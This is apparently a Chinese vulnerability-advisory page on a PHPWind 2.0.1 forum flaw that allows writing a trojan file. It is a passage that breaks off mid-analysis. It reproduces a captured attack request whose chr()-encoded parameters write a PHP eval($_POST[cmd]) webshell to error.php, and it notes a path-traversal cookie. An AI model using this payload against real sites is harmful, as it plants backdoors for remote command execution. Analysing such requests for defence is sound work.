PHPWIND 2.0.1论坛直接写入木马漏洞

- AV AC AU C I A
发布: 2025-03-27
修订: 2025-03-27

在程序运行时,我抓了一个包: GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt= (chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w), chr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79). chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62))?> HTTP/1.1 Content-Type: text/html Cookie:skinco=../../require/hidden; Host: www.5a609.com:81 Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) GET /phpwind//attachment/set.php HTTP/1.1 Content-Type: text/html Cookie:skinco=../../require/hidden; Host: www.5a609.com:81 Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) Chr()里的那些东西我查了一下ascii字符表,得到的是这样的: ?> 很显然是在error.php里写入一行php木马: 。 所以关键是: GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=中$D_name和$tidwt的出处。这两个东西很重要!于是我下了一个phpwind...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息